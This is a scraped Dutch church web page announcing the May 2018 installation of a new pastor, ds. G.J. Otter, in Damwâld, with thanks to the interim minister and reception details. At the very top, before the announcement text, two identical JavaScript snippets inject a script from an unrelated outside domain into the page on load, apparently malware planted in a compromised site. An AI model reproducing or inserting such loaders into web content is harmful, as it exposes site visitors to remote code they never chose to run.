;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Uitnodiging ... bevestiging en intrede ds. G.J. Otter - PKN Damwâld

Uitnodiging … bevestiging en intrede ds. G.J. Otter

Gepubliceerd op: maandag 30 april 2018

Wij zijn de Here God dankbaar dat we op 13 mei – De Ikker, 15.00 uur – weer een eigen predikant mogen verwelkomen. De kerkenraad van Hervormd Akkerwoude c.a. heet een ieder van harte welkom in deze heugelijke en gezamenlijke middagdienst. Een feestelijke viering waarin wij onze nieuwe predikant ds. G.J. Otter en zijn gezin verwelkomen in Damwâld. Wij hopen dat we samen een fijne dienst zullen beleven waarin ds. Otter officieel bevestigd zal worden als predikant van Hervormd Akkerwoude, Murmerwoude, Broeksterwoude en De Valom.

13 mei 2018 … eindelijk is het zover. Er is dus alle reden om feest te vieren! Na enkele maanden op zoek en in gesprek geweest te zijn, gaan wij als gemeente samen met ds. Otter verder op onze weg. Een weg die God ons zal wijzen. Een weg die begaanbaar is voor een ieder die naar Zijn stem luistert. Na zes fijne, opbouwende en inspirerende jaren met ds. G. Timmer als onze herder en leraar moesten en wilden wij op zoek naar een nieuwe predikant die ons verder leidt en onderwijst in Gods liefde en Woord. In dat traject hebben wij steeds in gebed de wil van God gezocht en hebben zijn leiding en richting dan ook gevoeld. We krijgen waar we naar gezocht hebben en waar we om gevraagd hebben: een energieke dominee, die ons kan verbinden, verbazen en verleiden.

De afgelopen maanden stonden voor een groot deel in het teken van de komst van onze nieuwe dominee. We kijken er allemaal erg naar uit. Met de bevestiging en intrede van de nieuwe predikant eindigt het consulentschap van ds. W.L. de Jong van de Protestantse Gemeente Rinsumageast. Vanaf maart 2017 heeft hij de taak als consulent van onze gemeente op bezielende en inspirerende wijze uitgevoerd. We kijken dan ook uit naar een feestelijke dienst en het begin van een goede samenwerking tussen predikant en gemeente. De bevestiging en intrededienst wordt geleid door ds. H. Dekker uit Marken, waarmee we vanzelfsprekend zeer verguld zijn. Na de dienst zal er in ’t Skûlplak, Buterblom 8 in Damwâld,  alle gelegenheid zijn om ds. Otter en zijn gezin de hand te schudden en hen welkom te heten.